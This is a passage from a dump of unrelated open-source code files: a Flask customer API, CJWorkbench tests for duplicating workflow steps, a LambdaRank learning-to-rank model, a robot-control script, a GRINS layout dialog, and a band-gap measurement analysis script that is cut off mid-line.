\"\\nSorry, there is nothing to load.\\n\"\n","repo_name":"jodiefostersarmy/T2A3","sub_path":"src/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":1956,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"5094508852","text":"from flask import Flask, render_template, jsonify, request\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_marshmallow import Marshmallow\nimport os\n\napp = Flask(__name__)\n\nbasedir = os.path.abspath(os.path.dirname(__file__))\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///' + os.path.join(basedir, 'customer.sqlite')\ndb = SQLAlchemy(app)\nma = Marshmallow(app)\n\n\nclass Customer(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n fname = db.Column(db.String(50), unique=False)\n lname = db.Column(db.String(50), unique=False)\n \n def __init__(self, fname, lname):\n self.fname = fname\n self.lname = lname\n \nclass CustomerSchema(ma.Schema):\n class Meta:\n fields = ('fname', 'lname')\n \ncustomer_schema=CustomerSchema()\ncustomers_schema=CustomerSchema(many=True)\n\n\n@app.route('/people')\ndef home():\n return render_template('index.html')\n\n@app.route('/customer', methods=[\"POST\"])\ndef add_customer():\n fname = request.json['fname']\n lname = request.json['lname']\n \n new_customer = Customer(fname, lname)\n db.session.add(new_customer)\n db.session.commit()\n customer = Customer.query.get(new_customer.id)\n return customer_schema.jsonify(customer)\n\n@app.route('/customers', methods=[\"GET\"])\ndef get_peoples():\n all_customers = Customer.query.all()\n results = customers_schema.dump(all_customers)\n return jsonify(results)\n\n@app.route('/', methods=[\"GET\"])\ndef get_customers():\n all_customers = Customer.query.all()\n results = customers_schema.dump(all_customers)\n return render_template('index.html', results=results)\n\nif __name__ == '__main__':\n app.run(debug=True)\n \n \n\n","repo_name":"RafaSadiq/Full-Stack-Projects","sub_path":"game/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1680,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"17484624499","text":"import datetime\nimport uuid as uuidgen\n\nfrom cjwkernel.util import tempfile_context\nfrom cjwstate import s3\nfrom cjwstate.storedobjects import create_stored_object\nfrom cjwstate.models import Workflow\nfrom cjwstate.tests.utils import DbTestCase, get_s3_object_with_data\n\n\n# Set up a simple pipeline on test data\nclass StepTests(DbTestCase):\n def test_step_duplicate(self):\n workflow = Workflow.create_and_init()\n step1 = workflow.tabs.first().steps.create(order=0, slug=\"step-1\")\n\n # store data to test that it is duplicated\n with tempfile_context() as path1:\n path1.write_bytes(b\"12345\")\n create_stored_object(workflow.id, step1.id, path1)\n with tempfile_context() as path2:\n path1.write_bytes(b\"23456\")\n so2 = create_stored_object(workflow.id, step1.id, path2)\n step1.secrets = {\"do not copy\": {\"name\": \"evil\", \"secret\": \"evil\"}}\n step1.stored_data_version = so2.stored_at\n step1.save(update_fields=[\"stored_data_version\"])\n\n # duplicate into another workflow, as we would do when duplicating a workflow\n workflow2 = Workflow.create_and_init()\n tab2 = workflow2.tabs.first()\n step1d = step1.duplicate_into_new_workflow(tab2)\n step1d.refresh_from_db() # test what we actually have in the db\n\n self.assertEqual(step1d.slug, \"step-1\")\n self.assertEqual(step1d.workflow, workflow2)\n self.assertEqual(step1d.module_id_name, step1.module_id_name)\n self.assertEqual(step1d.order, step1.order)\n self.assertEqual(step1d.notes, step1.notes)\n self.assertEqual(step1d.last_update_check, step1.last_update_check)\n self.assertEqual(step1d.is_collapsed, step1.is_collapsed)\n self.assertEqual(step1d.params, step1.params)\n self.assertEqual(step1d.secrets, {})\n\n # Stored data should contain a clone of content only, not complete version history\n self.assertEqual(step1d.stored_objects.count(), 1)\n self.assertEqual(step1d.stored_data_version, step1.stored_data_version)\n so2d = step1d.stored_objects.first()\n # The StoredObject was copied byte for byte into a different file\n self.assertNotEqual(so2d.key, so2.key)\n self.assertEqual(\n get_s3_object_with_data(s3.StoredObjectsBucket, so2d.key)[\"Body\"],\n get_s3_object_with_data(s3.StoredObjectsBucket, so2.key)[\"Body\"],\n )\n\n def test_step_duplicate_disable_auto_update(self):\n # Duplicates should be lightweight by default: no auto-updating.\n workflow = Workflow.create_and_init()\n tab = workflow.tabs.first()\n step = tab.steps.create(\n order=0,\n slug=\"step-1\",\n auto_update_data=True,\n next_update=datetime.datetime.now(),\n update_interval=600,\n )\n\n workflow2 = Workflow.create_and_init()\n tab2 = workflow2.tabs.create(position=0)\n step2 = step.duplicate_into_new_workflow(tab2)\n\n self.assertEqual(step2.auto_update_data, False)\n self.assertIsNone(step2.next_update)\n self.assertEqual(step2.update_interval, 600)\n\n def test_step_duplicate_clear_secrets(self):\n # Duplicates get new owners, so they should not copy secrets.\n workflow = Workflow.create_and_init()\n tab = workflow.tabs.first()\n step = tab.steps.create(\n order=0, slug=\"step-1\", secrets={\"auth\": {\"name\": \"x\", \"secret\": \"y\"}}\n )\n\n workflow2 = Workflow.create_and_init()\n tab2 = workflow2.tabs.first()\n step2 = step.duplicate_into_new_workflow(tab2)\n\n self.assertEqual(step2.secrets, {})\n\n def test_step_duplicate_copy_uploaded_file(self):\n workflow = Workflow.create_and_init()\n tab = workflow.tabs.first()\n step = tab.steps.create(order=0, slug=\"step-1\", module_id_name=\"upload\")\n uuid = str(uuidgen.uuid4())\n key = f\"{step.uploaded_file_prefix}{uuid}.csv\"\n s3.put_bytes(s3.UserFilesBucket, key, b\"1234567\")\n # Write the uuid to the old module -- we'll check the new module points\n # to a valid file\n step.params = {\"file\": uuid, \"has_header\": True}\n step.save(update_fields=[\"params\"])\n uploaded_file = step.uploaded_files.create(\n name=\"t.csv\", uuid=uuid, key=key, size=7\n )\n\n workflow2 = Workflow.create_and_init()\n tab2 = workflow2.tabs.first()\n step2 = step.duplicate_into_new_workflow(tab2)\n\n uploaded_file2 = step2.uploaded_files.first()\n self.assertIsNotNone(uploaded_file2)\n # New file gets same uuid -- because it's the same file and we don't\n # want to edit params during copy\n self.assertEqual(uploaded_file2.uuid, uuid)\n self.assertEqual(step2.params[\"file\"], uuid)\n self.assertTrue(\n # The new file should be in a different path\n uploaded_file2.key.startswith(step2.uploaded_file_prefix)\n )\n self.assertEqual(uploaded_file2.name, \"t.csv\")\n self.assertEqual(uploaded_file2.size, 7)\n self.assertEqual(uploaded_file2.created_at, uploaded_file.created_at)\n self.assertEqual(\n get_s3_object_with_data(s3.UserFilesBucket, uploaded_file2.key)[\"Body\"],\n b\"1234567\",\n )\n\n def test_step_duplicate_copy_only_selected_uploaded_file(self):\n workflow = Workflow.create_and_init()\n tab = workflow.tabs.first()\n step = tab.steps.create(order=0, slug=\"step-1\", module_id_name=\"upload\")\n uuid1 = str(uuidgen.uuid4())\n key1 = f\"{step.uploaded_file_prefix}{uuid1}.csv\"\n s3.put_bytes(s3.UserFilesBucket, key1, b\"1234567\")\n uuid2 = str(uuidgen.uuid4())\n key2 = f\"{step.uploaded_file_prefix}{uuid2}.csv\"\n s3.put_bytes(s3.UserFilesBucket, key2, b\"7654321\")\n uuid3 = str(uuidgen.uuid4())\n key3 = f\"{step.uploaded_file_prefix}{uuid3}.csv\"\n s3.put_bytes(s3.UserFilesBucket, key3, b\"9999999\")\n step.uploaded_files.create(name=\"t1.csv\", uuid=uuid1, key=key1, size=7)\n step.uploaded_files.create(name=\"t2.csv\", uuid=uuid2, key=key2, size=7)\n step.uploaded_files.create(name=\"t3.csv\", uuid=uuid3, key=key3, size=7)\n # Write the _middle_ uuid to the old module -- proving that we aren't\n # selecting by ordering\n step.params = {\"file\": uuid2, \"has_header\": True}\n step.save(update_fields=[\"params\"])\n\n workflow2 = Workflow.create_and_init()\n tab2 = workflow2.tabs.first()\n step2 = step.duplicate_into_new_workflow(tab2)\n\n self.assertEqual(step2.uploaded_files.count(), 1)\n new_uf = step2.uploaded_files.first()\n self.assertEqual(new_uf.uuid, uuid2)\n\n def test_delete_remove_uploaded_data_by_prefix_in_case_model_missing(self):\n workflow = Workflow.create_and_init()\n step = workflow.tabs.first().steps.create(order=0, slug=\"step-1\")\n uuid = str(uuidgen.uuid4())\n key = step.uploaded_file_prefix + uuid\n s3.put_bytes(s3.UserFilesBucket, key, b\"A\\n1\")\n # Don't create the UploadedFile. Simulates races during upload/delete\n # that could write a file on S3 but not in our database.\n # step.uploaded_files.create(name='t.csv', size=3, uuid=uuid, key=key)\n step.delete() # do not crash\n self.assertFalse(s3.exists(s3.UserFilesBucket, key))\n","repo_name":"CJWorkbench/cjworkbench","sub_path":"cjwstate/tests/models/test_step.py","file_name":"test_step.py","file_ext":"py","file_size_in_byte":7415,"program_lang":"python","lang":"en","doc_type":"code","stars":297,"dataset":"github-code","pt":"48"} +{"seq_id":"9897549499","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"Description\nChristopher J.C. Burges, Robert Ragno, and Quoc Viet Le. 2006.\nLearning to Rank with Nonsmooth Cost Functions. In Proceedings of NIPS conference. 193–200.\n\"\"\"\n\nimport torch\nimport torch.nn.functional as F\n\nfrom ptranking.base.ranker import NeuralRanker\nfrom ptranking.data.data_utils import LABEL_TYPE\nfrom ptranking.metric.metric_utils import get_delta_ndcg\nfrom ptranking.ltr_adhoc.eval.parameter import ModelParameter\n\nclass LambdaRank(NeuralRanker):\n '''\n Christopher J.C. Burges, Robert Ragno, and Quoc Viet Le. 2006.\n Learning to Rank with Nonsmooth Cost Functions. In Proceedings of NIPS conference. 193–200.\n '''\n def __init__(self, sf_para_dict=None, model_para_dict=None, gpu=False, device=None,\n opt='Adam', lr = 1e-3, weight_decay=1e-3):\n super(LambdaRank, self).__init__(id='LambdaRank', sf_para_dict=sf_para_dict, gpu=gpu, device=device,\n opt=opt, lr = lr, weight_decay=weight_decay)\n self.sigma = model_para_dict['sigma']\n\n def inner_train(self, batch_preds, batch_stds, **kwargs):\n '''\n :param batch_preds: [batch, ranking_size] each row represents the relevance predictions for documents within a ltr_adhoc\n :param batch_stds: [batch, ranking_size] each row represents the standard relevance grades for documents within a ltr_adhoc\n '''\n label_type = kwargs['label_type']\n assert LABEL_TYPE.MultiLabel == label_type\n assert 'presort' in kwargs and kwargs['presort'] is True # aiming for direct usage of ideal ranking\n\n batch_preds_sorted, batch_preds_sorted_inds = torch.sort(batch_preds, dim=1, descending=True) # sort documents according to the predicted relevance\n batch_stds_sorted_via_preds = torch.gather(batch_stds, dim=1, index=batch_preds_sorted_inds) # reorder batch_stds correspondingly so as to make it consistent. BTW, batch_stds[batch_preds_sorted_inds] only works with 1-D tensor\n\n batch_std_diffs = torch.unsqueeze(batch_stds_sorted_via_preds, dim=2) - torch.unsqueeze(batch_stds_sorted_via_preds, dim=1) # standard pairwise differences, i.e., S_{ij}\n batch_std_Sij = torch.clamp(batch_std_diffs, min=-1.0, max=1.0) # ensuring S_{ij} \\in {-1, 0, 1}\n batch_std_p_ij = 0.5 * (1.0 + batch_std_Sij)\n\n batch_s_ij = torch.unsqueeze(batch_preds_sorted, dim=2) - torch.unsqueeze(batch_preds_sorted, dim=1) # computing pairwise differences, i.e., s_i - s_j\n batch_p_ij = 1.0 / (torch.exp(-self.sigma * batch_s_ij) + 1.0)\n\n batch_delta_ndcg = get_delta_ndcg(batch_ideally_sorted_stds=batch_stds, batch_stds_sorted_via_preds=batch_stds_sorted_via_preds, label_type=label_type, gpu=self.gpu)\n\n # about reduction, mean leads to poor performance, a probable reason is that the small values due to * lambda_weight * mean\n batch_loss = F.binary_cross_entropy(input=torch.triu(batch_p_ij, diagonal=1),\n target=torch.triu(batch_std_p_ij, diagonal=1),\n weight=torch.triu(batch_delta_ndcg, diagonal=1), reduction='sum')\n self.optimizer.zero_grad()\n batch_loss.backward()\n self.optimizer.step()\n\n return batch_loss\n\n\n###### Parameter of LambdaRank ######\n\nclass LambdaRankParameter(ModelParameter):\n ''' Parameter class for LambdaRank '''\n def __init__(self, debug=False, para_json=None):\n super(LambdaRankParameter, self).__init__(model_id='LambdaRank', para_json=para_json)\n self.debug = debug\n\n def default_para_dict(self):\n \"\"\"\n Default parameter setting for LambdaRank\n :return:\n \"\"\"\n self.lambda_para_dict = dict(model_id=self.model_id, sigma=1.0)\n return self.lambda_para_dict\n\n def to_para_string(self, log=False, given_para_dict=None):\n \"\"\"\n String identifier of parameters\n :param log:\n :param given_para_dict: a given dict, which is used for maximum setting w.r.t. grid-search\n :return:\n \"\"\"\n # using specified para-dict or inner para-dict\n lambda_para_dict = given_para_dict if given_para_dict is not None else self.lambda_para_dict\n\n s1, s2 = (':', '\\n') if log else ('_', '_')\n lambdarank_para_str = s1.join(['Sigma', '{:,g}'.format(lambda_para_dict['sigma'])])\n return lambdarank_para_str\n\n def grid_search(self):\n \"\"\"\n Iterator of parameter settings for LambdaRank\n \"\"\"\n if self.use_json:\n choice_sigma = self.json_dict['sigma']\n else:\n choice_sigma = [5.0, 1.0] if self.debug else [1.0] # 1.0, 10.0, 50.0, 100.0\n\n for sigma in choice_sigma:\n self.lambda_para_dict = dict(model_id=self.model_id, sigma=sigma)\n yield self.lambda_para_dict\n","repo_name":"SprocketLab/universalizing-weak-supervision","sub_path":"code/ptranking/ptranking/ltr_adhoc/listwise/lambdarank.py","file_name":"lambdarank.py","file_ext":"py","file_size_in_byte":4895,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"48"} +{"seq_id":"11331733761","text":"\"\"\"\nSet and dict implments hashing \nset is used when we have a collection of keys\ndict when we have key value pairs\n\nUseful when we wish to have fast search, insert and delete (all three operations are O(1))\n\"\"\"\n\n#set\nsetExample={\"test1\",\"test2\",\"Test3\"}\n\nsetExample.add(\"test4\")\nprint(setExample)","repo_name":"DwijanX/ConcursoPrograUsingPythonPractice","sub_path":"Python Libs/Hashing.py","file_name":"Hashing.py","file_ext":"py","file_size_in_byte":297,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"42250739105","text":"import math\r\nimport time\r\nfrom sr.robot import *\r\nR = Robot()\r\n\r\n\r\ndef drive(dist=0, angle=0, _time=0): # dir in degrees\r\n if angle != 0:\r\n R.motors[0].m0.power = (120 * int(angle < 0)) - 60\r\n R.motors[0].m1.power = (120 * int(angle > 0)) - 60\r\n time.sleep(abs(angle) / rot_speed)\r\n R.motors[0].m0.power = 0\r\n R.motors[0].m1.power = 0\r\n if dist != 0:\r\n R.motors[0].m0.power = 60\r\n R.motors[0].m1.power = 60\r\n time.sleep(dist / 0.91) # time = distance / speed\r\n R.motors[0].m0.power = 0\r\n R.motors[0].m1.power = 0\r\n elif _time != 0:\r\n R.motors[0].m0.power = 60\r\n R.motors[0].m1.power = 60\r\n time.sleep(_time)\r\n R.motors[0].m0.power = 0\r\n R.motors[0].m1.power = 0\r\n\r\n\r\nwhile True:\r\n circumference = ((analogRead(4) * (20.0/16384.0)) + 20) * math.pi # c=pi*d\r\n rot_time = circumference / 0.91 # circumference / speed of wheels = circumferences per sec\r\n rot_speed = 360 / rot_time # degrees per second\r\n\r\n markers = R.see(res=(1296, 736))\r\n if len(markers) > 0:\r\n drive(dist=markers[0].dist, angle=markers[0].rot_y)\r\n","repo_name":"tpoomlmly/robocon","sub_path":"test scripts/drive to cube.py","file_name":"drive to cube.py","file_ext":"py","file_size_in_byte":1155,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"19191461842","text":"__version__ = \"$Id$\"\n\n# @win32doc|LayoutViewDialog\n# This class represents the interface between the LayoutView platform independent\n# class and its implementation class _LayoutView in lib/win32/_LayoutView.py which\n# implements the actual view.\n\nimport windowinterface\nfrom usercmd import *\nIMPL_AS_FORM=1\n\nclass LayoutViewDialog:\n def __init__(self):\n self.__window=None\n\n def createviewobj(self):\n f=self.toplevel.window\n\n w=f.newviewobj('lview_')\n\n self.__layoutlist=w['LayoutList']\n self.__layoutlist.setcb((self.__layoutcb, ()))\n\n self.__channellist=w['ChannelList']\n self.__channellist.setcb((self.__channelcb, ()))\n\n self.__otherlist=w['OtherList']\n self.__otherlist.setcb((self.__othercb, ()))\n\n self.__window = w\n\n def destroy(self):\n if self.__window is None:\n return\n if hasattr(self.__window,'_obj_') and self.__window._obj_:\n self.__window.close()\n self.__window = None\n del self.__layoutlist\n del self.__channellist\n del self.__otherlist\n\n def show(self):\n self.assertwndcreated()\n self.__window.show()\n\n def is_showing(self):\n if self.__window is None:\n return 0\n return self.__window.is_showing()\n\n def hide(self):\n if self.__window is not None:\n self.__window.close()\n self.__window = None\n f=self.toplevel.window\n f.set_toggle(LAYOUTVIEW,0)\n\n\n def assertwndcreated(self):\n if self.__window is None or not hasattr(self.__window,'GetSafeHwnd'):\n self.createviewobj()\n if self.__window.GetSafeHwnd()==0:\n f=self.toplevel.window\n if IMPL_AS_FORM: # form\n f.showview(self.__window,'lview_')\n self.__window.show()\n else:# dlgbar\n self.__window.create(f)\n f.set_toggle(LAYOUTVIEW,1)\n\n def setlayoutlist(self, layouts, cur):\n # the core should be corected but\n # in order to proceed let fill the hole here\n self.assertwndcreated()\n if layouts != self.__layoutlist.getlist():\n self.__layoutlist.delalllistitems()\n self.__layoutlist.addlistitems(layouts, 0)\n if cur is not None:\n self.__layoutlist.selectitem(layouts.index(cur))\n else:\n self.__layoutlist.selectitem(None)\n\n def setchannellist(self, channels, cur):\n if channels != self.__channellist.getlist():\n self.__channellist.delalllistitems()\n self.__channellist.addlistitems(channels, 0)\n if cur is not None:\n self.__channellist.selectitem(channels.index(cur))\n else:\n self.__channellist.selectitem(None)\n\n def setotherlist(self, channels, cur):\n if channels != self.__otherlist.getlist():\n self.__otherlist.delalllistitems()\n self.__otherlist.addlistitems(channels, 0)\n if cur is not None:\n self.__otherlist.selectitem(channels.index(cur))\n\n def layoutname(self):\n return self.__layoutlist.getselection()\n\n def __layoutcb(self):\n sel = self.__layoutlist.getselected()\n if sel is None:\n self.curlayout = None\n else:\n self.curlayout = self.__layoutlist.getlistitem(sel)\n self.fill()\n\n def __channelcb(self):\n sel = self.__channellist.getselected()\n if sel is None:\n self.curchannel = None\n else:\n self.curchannel = self.__channellist.getlistitem(sel)\n self.fill()\n\n def __othercb(self):\n sel = self.__otherlist.getselected()\n if sel is None:\n self.curother = None\n else:\n self.curother = self.__otherlist.getlistitem(sel)\n self.fill()\n\n def setwaiting(self):\n windowinterface.setwaiting()\n\n def setready(self):\n windowinterface.setready()\n\n def setcommandlist(self, commandlist):\n self.__window.set_commandlist(commandlist)\n\n def asklayoutname(self, default):\n w=windowinterface.LayoutNameDlg('Name for layout',\n default,\n self.newlayout_callback,\n cancelCallback = (self.newlayout_callback, ()),\n parent = self.__window)\n w.show()\n\n\n def askchannelnameandtype(self, default, types):\n w=windowinterface.NewChannelDlg('newchanneldialog',default,grab = 1,\n parent = self.__window)\n self.__chanwin = w\n self.__chantext=w._chantext\n self.__chantype=w._chantype\n self.__chantype._optionlist=types[:]\n w._cbd_ok=(self.__okchannel, (1,))\n w._cbd_cancel=(self.__okchannel, (0,))\n w.show()\n\n def __okchannel(self, ok = 0):\n if ok:\n name = self.__chantext.gettext()\n type = self.__chantype.getvalue()\n else:\n name = type = None\n self.__chanwin.close() # <- end of grab mode\n del self.__chantext\n del self.__chantype\n del self.__chanwin\n apply(apply,(self.newchannel_callback, (name, type)))\n\n # if in grab mode:\n # We can't call this directly since we're still in\n # grab mode. We must first return from this callback\n # before we're out of that mode, so we must schedule a\n # callback in the very near future.\n # windowinterface.settimer(0.00001, (self.newchannel_callback, (name, type)))\n","repo_name":"cwi-dis/grins","sub_path":"mm/editor/win32/LayoutViewDialog.py","file_name":"LayoutViewDialog.py","file_ext":"py","file_size_in_byte":5622,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"1945535530","text":"import numpy as np\nimport pylab as plt\nfrom matplotlib import rcParams\nfrom scipy.optimize import curve_fit\nimport scipy.constants as co\nimport uncertainties as uc\nimport uncertainties.unumpy as un\nfrom scipy.signal import argrelextrema as ext\nimport seaborn as sns\n\nfontsize_labels = 22 # size used in latex document\nrcParams['font.family'] = 'serif'\nrcParams['font.serif'] = ['Computer Modern Roman']\nrcParams['text.usetex'] = True\nrcParams['figure.autolayout'] = True\nrcParams['font.size'] = fontsize_labels\nrcParams['axes.labelsize'] = fontsize_labels\nrcParams['xtick.labelsize'] = fontsize_labels\nrcParams['ytick.labelsize'] = fontsize_labels\nrcParams['legend.fontsize'] = fontsize_labels\nrcParams['figure.figsize'] = (2*6.2, 2*3.83) # in inches; width corresponds to \\textwidth in latex document (golden ratio)\n\nplt.close(\"all\")\nshow_fig = True\nsave_fig = False # see below\nif not save_fig:\n rcParams['figure.figsize'] = (15, 8) # in inches; width corresponds to \\textwidth in latex document (golden ratio)\nsave_coeff = False # do ONLY save, if scipy 0.14. is in use...\nfig_dir = \"../figures/\"\nnpy_dir = \"./data_npy/\"\n\n# angle to energy\ndef ang_to_E(alpha, sample_name):\n deg_to_rad = lambda phi_deg: 2 * np.pi / 360 * phi_deg\n phi = deg_to_rad(alpha)\n if sample_name == \"Si\":\n d = 1 / 1200 / 1000\n if sample_name == \"Ge\":\n d = 1 / 600 / 1000\n psi = deg_to_rad(7.5)\n E = co.h * co.c / (2 * d * abs(np.sin(phi)) * np.cos(psi))\n En = E / co.e # Energy in eV\n return(En)\n\ndef polygon(x_grid, x_arr, y_arr):\n y_on_grid = x_grid * 0\n for i, x in enumerate(x_grid):\n x_less = x_arr < x\n x1 = x_arr[x_less][-1]\n y1 = y_arr[x_less][-1]\n x_greater = x_arr > x\n x2 = x_arr[x_greater][0]\n y2 = y_arr[x_greater][0]\n y_x = (y1 * (x - x1) + y2 * (x2 - x)) / (x2 - x1)\n y_on_grid[i] = y_x\n return y_on_grid\n\n\nEs = 4 * [0]\ndEs = np.zeros(4)\nf = open(\"band_gap_results.tex\", \"w+\")\nf.write(\"\\t\\\\begin{tabular}{|p{1.5cm}|p{1.5cm}|p{1.5cm}|p{1.5cm}|p{2cm}|p{2cm}|p{2.7cm}|}\\n\")\nf.write(\"\\t\\t\\hline\\n\")\nf.write(\"\\t\\t\\\\rowcolor{tabcolor}\\n\")\nf.write(\"\\t\\tSample & $\\phi_g / ^\\circ$ & \\n \\\n\\t\\t\\t$\\overline{\\phi_\\mathrm{lower}}/ ^\\circ$ & $\\overline{\\phi_\\mathrm{upper}}/ ^\\circ$ &\\n \\\n\\t\\t\\t$E_\\mathrm{lower}$/ eV & $E_\\mathrm{upper}$/ eV & $E_g$ / eV \\\\\\\\ \\hline\\n\")\nfor sample_name in [\"Si\", \"Ge\"]:\n fig1, ax1 = plt.subplots(1, 1)\n if not save_fig:\n fig1.suptitle(\"Band Gap, Sample: \" + sample_name)\n for suffix in [\"2\"]:\n npy_file = npy_dir + \"band_gap_\" + sample_name + \"_\" + suffix + \".npy\"\n angle, trans, absorp = np.load(npy_file)\n if angle[0] > 0:\n angle, trans, absorp = angle[::-1], trans[::-1], absorp[::-1]\n plot_t, = ax1.plot(angle, trans, '.', alpha=0.8, label=(r'$T_\\mathrm{' + sample_name + r'}$'))\n next(ax1._get_lines.color_cycle)\n plot_a, = ax1.plot(angle, absorp, '.', alpha=0.8, label=(r'$A_\\mathrm{' + sample_name + r'}$'))\n next(ax1._get_lines.color_cycle)\n for suffix in [\"lamp\"]:\n npy_file = npy_dir + \"band_gap_\" + sample_name + \"_\" + suffix + \".npy\"\n angle_lamp, trans_lamp, dummy = np.load(npy_file)\n if angle_lamp[0] > 0:\n angle_lamp, trans_lamp, absorp_lamp = angle_lamp[::-1], trans_lamp[::-1], absorp_lamp[::-1]\n plot_lamp, = ax1.plot(angle_lamp, trans_lamp, '.', alpha=0.8, label=r'$L$')\n for suffix in [\"background\"]:\n npy_file = npy_dir + \"band_gap_\" + sample_name + \"_\" + suffix + \".npy\"\n angle_bg, trans_bg, absorp_bg = np.load(npy_file)\n if angle_bg[0] > 0:\n angle_bg, trans_bg, absorp_bg = angle_bg[::-1], trans_bg[::-1], absorp_bg[::-1]\n #plot_t_bg, = ax1.plot(angle_bg, trans_bg, '.', alpha=0.8, label=r'$T_\\mathrm{background}$')\n #plot_a_bg, = ax1.plot(angle_bg, absorp_bg, '.', alpha=0.8, label=r'$A_\\mathrm{background}$')\n # place a text box in upper left in axes coords\n props = dict(boxstyle='round', facecolor='white', alpha=0.5)\n textstr = 'Sample: ' + sample_name\n ax1 = plt.gca()\n ax1.text(0.1, 0.95, textstr, transform=ax1.transAxes, va='top', bbox=props)\n ax1.set_xlim(angle[0], angle[-1])\n ax1.set_ylim(0, 3)\n ax1.set_xlabel(\"angle / degrees\")\n ax1.set_ylabel(\"$U$ / V\")\n ax1.legend(loc=1)\n if show_fig:\n fig1.show()\n if save_fig:\n file_name = \"band_gap_raw_\" + sample_name\n fig1.savefig(fig_dir + file_name + \".pdf\")\n fig1.savefig(fig_dir + file_name + \".png\")\n\n #trans_real = (trans - trans_background)/ trans_lamp\n # the data is not defined on the same array of angles, we need to interpolate onto one grid!\n # get the ends and length of the grid\n lower_angle = max(angle[0], angle_bg[0], angle_lamp[0])\n upper_angle = min(angle[-1], angle_bg[-1], angle_lamp[-1])\n min_len = min(len(np.where((angle > lower_angle) * (angle < upper_angle))[0]),\n len(np.where((angle_bg > lower_angle) * (angle_bg < upper_angle))[0]), \n len(np.where((angle_lamp > lower_angle) * (angle_lamp < upper_angle))[0]))\n # create a grid on a subset of the intersection of all three angles intervals\n x_grid = np.linspace(lower_angle, upper_angle, min_len + 1) # \"+1\" to be able to cut of the edges\n x_grid = x_grid[1:-1] # cut the edges\n\n # real transmission and absorption\n lamp = polygon(x_grid, angle_lamp, trans_lamp)\n\n t = polygon(x_grid, angle, trans)\n t_bg = polygon(x_grid, angle_bg, trans_bg)\n t_real = (t - t_bg) / lamp\n\n a = polygon(x_grid, angle, absorp)\n a_bg = polygon(x_grid, angle_bg, absorp_bg)\n a_real = (a - a_bg) / lamp\n\n # choosing side\n for i in range(2):\n j = i\n if sample_name == \"Si\":\n j += 2\n print(j)\n side = [\"left\", \"right\", \"left\", \"right\"] # side of the recorded spectrum\n xlims = [(-40, -25), (25, 40), (-49, -35), (35, 50)] # limits for plotting\n xlims1 = [(-60, -25), (25, 40), (-49, -35), (35, 50)] # limits for plotting\n ylims = [(0, 0.6), (0, 1.2), (0, 1.2), (0, 1.2)]\n fit_ranges_t = [(-34.6, -31.4), (30.0, 34.6), (-43.0, -38.0), (37.0, 43.0)] # data points for interpolation of transmission\n fit_ranges_a = [(-36.0, -31.9), (31.3, 36.0), (-46.0, -38.0), (38.0, 44.2)] # data points for interpolation of absorption\n legend_loc = [1, 2, 6, 5] # location of the legend\n x_hori = [x_grid[x_grid < -30], x_grid[x_grid > 29], \n x_grid[x_grid < -37], x_grid[x_grid > 29]][j] # horizontal line should not cross the legend but intersect\n\n # plotting real transmission and absorption signals\n fig1, ax1 = plt.subplots(1, 1)\n if not save_fig:\n fig1.suptitle(\"Band Gap, Sample: \" + sample_name + \", \" + side[j])\n ax1.plot(x_grid, t_real, '.', c=plot_t.get_color(), alpha=0.8, label=(r'$T_\\mathrm{' + sample_name + r', corrected}$'))\n ax1.plot(x_grid, a_real, '.', c=plot_a.get_color(), alpha=0.8, label=(r'$A_\\mathrm{' + sample_name + r', corrected}$'))\n ax1.set_xlim(xlims1[j])\n ax1.set_ylim(ylims[j])\n ax1.set_xlabel(\"angle / rad\")\n ax1.set_ylabel(\"$U$ / V\")\n ax1.legend(loc=1)\n if show_fig:\n fig1.show()\n if save_fig:\n file_name = \"band_gap_detail_\" + sample_name + \"_\" + side[j]\n fig1.savefig(fig_dir + file_name + \".pdf\")\n fig1.savefig(fig_dir + file_name + \".png\")\n\n # do the interpolation!\n # normalizing\n max_t = max(t_real[(x_grid > xlims[j][0]) * (x_grid < xlims[j][1])])\n t_real = t_real / max_t\n max_a = max(a_real[(x_grid > xlims[j][0]) * (x_grid < xlims[j][1])])\n a_real = a_real / max_a\n # linear fit\n # Transmission\n fit_range_t = fit_ranges_t[j]\n index_fit = (x_grid > fit_range_t[0]) * (x_grid < fit_range_t[1])\n alpha_fit_t = x_grid[index_fit]\n t_fit = t_real[index_fit]\n x_borders_t = alpha_fit_t[[0, -1]]\n t_borders = t_fit[[0, -1]]\n def t_func(alpha, a, b):\n return a * alpha + b\n t_c, t_cov = curve_fit(t_func, alpha_fit_t, t_fit, p0=None) #, sigma=t_std_dev)#, absolute_sigma=True) # this will not work for scipy 0.13.\n t_uc = uc.correlated_values(t_c, t_cov)\n\n # Absorption\n fit_range_a = fit_ranges_a[j]\n index_fit = (x_grid > fit_range_a[0]) * (x_grid < fit_range_a[1])\n alpha_fit_a = x_grid[index_fit]\n a_fit = a_real[index_fit]\n x_borders_a = alpha_fit_a[[0, -1]]\n a_borders = a_fit[[0, -1]]\n min_a = min(a_real[(x_grid > xlims[j][0]) * (x_grid < xlims[j][1])])\n def a_func(alpha, a, b):\n return a * alpha + b\n a_c, a_cov = curve_fit(a_func, alpha_fit_a, a_fit, p0=None) #, sigma=t_std_dev)#, absolute_sigma=True) # this will not work for scipy 0.13.\n a_uc = uc.correlated_values(a_c, a_cov)\n\n # find intersect of horizontals and interpolations\n x_int_up_t = (1 - t_c[1]) / t_c[0]\n x_int_lo_t = (min_a - t_c[1]) / t_c[0]\n x_int_t = np.array([x_int_up_t, x_int_lo_t])\n x_int_up_a = (1 - a_c[1]) / a_c[0]\n x_int_lo_a = (min_a - a_c[1]) / a_c[0]\n x_int_a = np.array([x_int_up_a, x_int_lo_a])\n\n # intersection of the two straight lines\n x_int = -(t_c[1] - a_c[1]) / (t_c[0] - a_c[0])\n x_int_lo = 0.5 * (x_int_lo_t + 